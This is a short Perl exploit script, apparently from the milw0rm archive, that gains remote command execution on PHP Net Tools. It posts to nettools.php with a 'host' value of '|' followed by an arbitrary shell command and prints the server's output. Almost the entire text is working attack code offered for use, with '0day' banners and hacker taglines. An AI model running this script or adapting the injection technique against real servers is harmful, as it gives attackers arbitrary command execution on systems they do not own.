#!/usr/bin/perl
# PHP Net Tools Remote Code Execution Exploit
#
# by FOX_MULDER (fox_mulder@abv.bg)
# Vulnerability found by FOX_MULDER.
#
# "Born to be root !!!"
#----------------------------------+
#PHP Net Tools                     |
#Copyright (C) 2005 Eric Robertson |
#h4rdc0d3@gmail.com                |
#----------------------------------+
#
# Fact:Wbyte counted twice to infinity !!!
#
#
###################################################
	use LWP 5.64;

	my $hostname = $ARGV[0];
	my $dir = $ARGV[1];
	my $command = $ARGV[2];

        if (@ARGV<2) {
	print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n";
	exit();
	}

	print "=======================================================\n";
	print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n";
	print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n";
	print "fox_mulder@abv.bg\r\n";
	print "=======================================================\n";

	my $browser = LWP::UserAgent->new;
	$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
	print "\n\n[+]Sending request to server . . .\r\n";

	my $url = "http://$hostname$dir/nettools.php";


	my $response = $browser->post( $url,[
		'ping' => '1',
        	'host' => "|$command"]);

 	my $code = $response->status_line;
        print "[+] HTTP RESPONSE $code\n";
        print "\n[+]Injecting command . . .\n";
	$response->content =~ /blockquote>(.*)<\/blockquote>/s;
	print "$1\n";

# milw0rm.com [2006-04-18]